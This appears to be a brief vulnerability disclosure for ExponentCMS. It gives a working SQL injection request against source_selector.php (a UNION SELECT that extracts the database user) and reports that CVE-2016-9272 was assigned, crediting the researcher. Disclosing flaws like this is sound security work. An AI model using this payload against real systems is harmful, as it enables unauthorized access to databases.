http://xx.com/source_selector.php?controller=company&action=show &id=1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1%23 In framework/modules/companyController.php ...
exponentcms Hi, I have successfully applied for a CVEID(CVE-2016-9272) for this SQL injection vulnerability. Credit:Nicky of Tencent Security Platform Department Thank you.